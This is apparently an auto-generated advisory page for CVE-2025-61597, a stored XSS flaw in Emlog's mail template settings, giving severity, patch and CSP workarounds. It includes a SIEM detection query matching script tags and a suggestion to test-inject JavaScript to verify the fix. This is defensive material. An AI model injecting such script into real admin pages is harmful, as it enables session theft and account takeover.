CVE-2025-61597 – Emlog versions 2.5.21 and below contain a store... (How to Fix)

Q: What is the severity of CVE-2025-61597?

CVE-2025-61597 has a CVSS score of 7.6 (HIGH). Emlog versions 2.5.21 and below contain a stored cross-site scripting (XSS) vulnerability in mail template settings. An attacker with admin access can inject malicious JavaScript that executes when other admins view the settings page, potentially leading to session theft and full admin account compromise. This affects all Emlog installations using vulnerable versions.

📋 TL;DR

Emlog versions 2.5.21 and below contain a stored cross-site scripting (XSS) vulnerability in mail template settings. An attacker with admin access can inject malicious JavaScript that executes when other admins view the settings page, potentially leading to session theft and full admin account compromise. This affects all Emlog installations using vulnerable versions.

💻 Affected Systems

Products:

Emlog

Versions: 2.5.21 and below

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires admin access to exploit; affects all installations with default configuration.

📦 What is this software?

Emlog by Emlog

View all CVEs affecting Emlog →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete admin account takeover leading to website defacement, data theft, backdoor installation, and further server compromise.

🟠

Likely Case

Session token theft allowing attacker to impersonate admin, modify content, install plugins, or access sensitive data.

🟢

If Mitigated

Limited to admin interface with no data exfiltration if proper input validation and output encoding are implemented.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploit requires admin credentials; proof-of-concept available in GitHub advisory.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.5.22

Vendor Advisory: https://github.com/emlog/emlog/security/advisories/GHSA-hj97-hp2c-6m4m

Restart Required: No

Instructions:

1. Backup your Emlog installation and database. 2. Download version 2.5.22 from official repository. 3. Replace all files with new version. 4. Verify mail template settings no longer accept HTML injection.

🔧 Temporary Workarounds

Disable mail template editing

all

Remove or restrict access to mail template settings page for non-essential admins.

Implement Content Security Policy

all

Add CSP headers to prevent JavaScript execution from untrusted sources.

Add to .htaccess: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Add to nginx config: add_header Content-Security-Policy "default-src 'self'; script-src 'self'";

🧯 If You Can't Patch

Restrict admin access to trusted IP addresses only.
Implement web application firewall (WAF) rules to block XSS payloads in POST requests.

🔍 How to Verify

Check if Vulnerable:

Check Emlog version in admin panel or via database query: SELECT * FROM emlog_options WHERE option_name='emlog_version'

Check Version:

Check admin dashboard or run: grep -r "emlog_version" /path/to/emlog/ files

Verify Fix Applied:

Attempt to inject HTML/JavaScript in mail template settings and verify it's properly sanitized or rejected.

📡 Detection & Monitoring

Log Indicators:

Unusual admin login patterns
Multiple failed login attempts followed by successful login
POST requests to mail template settings with script tags

Network Indicators:

Outbound connections to suspicious domains from admin sessions
Unusual traffic patterns from admin interface

SIEM Query:

source="web_logs" AND (uri="/admin/mail_template" OR uri="/admin/settings") AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2025-61597

CVSS v3 Score: 7.6 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L

CWE: CWE-79

EPSS Score: 0.06% exploit probability (17.2th percentile)

Published: October 3, 2025

Last Updated: October 20, 2025

🔗 References

https://github.com/emlog/emlog/pull/179 Patch
https://github.com/emlog/emlog/security/advisories/GHSA-hj97-hp2c-6m4m Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-61597, you might also want to check these: